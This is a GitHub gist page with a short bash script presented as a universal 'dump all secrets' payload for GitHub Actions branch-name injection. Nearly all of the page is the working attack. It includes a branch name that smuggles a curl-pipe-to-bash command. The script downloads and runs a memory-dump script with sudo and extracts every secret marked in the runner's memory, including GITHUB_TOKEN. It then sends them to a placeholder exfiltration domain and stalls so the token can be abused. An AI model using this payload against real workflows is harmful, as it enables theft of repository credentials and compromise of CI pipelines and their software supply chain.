-
-
Save AkshayJainG/4af3c967c4b7cdde19e7c3be9232d3cf to your computer and use it in GitHub Desktop.
Universal "dump all secrets" payload for GitHub workflow branch name injection.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# Replace with Burp collaborator domain or similar. | |
YOUR_EXFIL="https://your-exfil-domain.com" | |
# Deliver via branch name: 'Hacked”;{curl,-sSfL,gist.githubusercontent.com/YourUser/Hash/raw/payload.sh}${IFS}|${IFS}bash' | |
# Uses memory dump technique from github.com/nikitastupin/pwnhub / with regex to parse out all secret values (including GITHUB_TOKEN) | |
if [[ "$OSTYPE" == "linux-gnu" ]]; then | |
B64_BLOB=`curl -sSf https://gist.githubusercontent.com/nikitastupin/30e525b776c409e03c2d6f328f254965/raw/memdump.py | sudo python3 | tr -d '\0' | grep -aoE '"[^"]+":\{"value":"[^"]*","isSecret":true\}' | sort -u | base64 -w 0 | base64 -w 0` | |
# Print to run log | |
echo $B64_BLOB | |
# Exfil to Burp | |
curl -s -d "$B64_BLOB" https://$YOUR_EXFIL/token > /dev/null | |
# Sleep for 15 mins to abuse GITHUB_TOKEN | |
sleep 900 | |
else | |
exit 0 | |
fi |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment